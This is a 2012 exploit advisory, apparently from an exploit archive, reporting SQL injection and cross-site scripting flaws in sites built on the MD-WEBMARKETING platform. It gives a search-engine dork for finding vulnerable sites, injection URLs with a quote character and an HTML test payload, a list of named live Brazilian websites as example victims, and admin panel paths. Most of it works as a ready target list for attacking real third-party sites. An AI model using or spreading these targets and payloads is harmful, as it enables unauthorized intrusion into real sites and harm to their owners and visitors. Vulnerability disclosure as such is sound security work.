###############################################################################################################
# Exploit Title : MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities
# Date
: 06-11-2012
# Author
: Caleb Bucker (Independent Security Researcher)
# Contact
: https://twitter.com/CalebDrugs
# Website
: www.calebbucker.blogspot.com
# Vendor
: MD Webmarketing
# URL Vendor
: http://mdwebmarketing.com.br/
# Category
: WebApps
# Dork
: "Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
# Tested on:
: BackTrack 5 R3
###############################################################################################################
###############################################################################################################
[~]
Exploit:
http://www.site-web.com/***.php?id=
[SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]
###############################################################################################################
[~]
Example Sites SQL Injection:
http://www.acontecenews.com.br/exibe.php?id=65637'
http://www.revistapenseleve.com.br/exibe.php?id=1331'
http://itaporaagora.com.br/exibe.php?id=133050'
http://www.pierreadrileiloes.com.br/exibe.php?id=61712'
http://www.viaruralagro.com.br/loja/detalhes.php?id=24'
###############################################################################################################
[~]
Example Sites Cross Site Scripting:
http://www.acontecenews.com.br/exibe.php?id=62587&cod_editorial=&url=index.php&pag=&busca="<h2>TEST</h2>
http://www.itaporaagora.com.br/exibe.php?id=132094&cod_editorial=&url=exibe.php&pag=&busca="<h2>TEST</h2>
http://www.deodapolisagora.com.br/exibe.php?id=131746&cod_editorial=&url=&pag=&busca="<h2>TEST</h2>
###############################################################################################################
[~]
Screenshot:
http://imageshack.us/a/img443/2181/testwwh.png [SQL Injection]
http://imageshack.us/a/img687/7656/test2sc.png
[Cross Site Scripting]
###############################################################################################################
[~]
Location Panel Administrative:
http://www.site-web.com/adm
http://www.site-web.com/admin
###############################################################################################################
# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend
###############################################################################################################
More Info:
http://packetstormsecurity.org/files/117927/MD-Webmarketing-Cross-Site-Scripting-SQL-Injection.html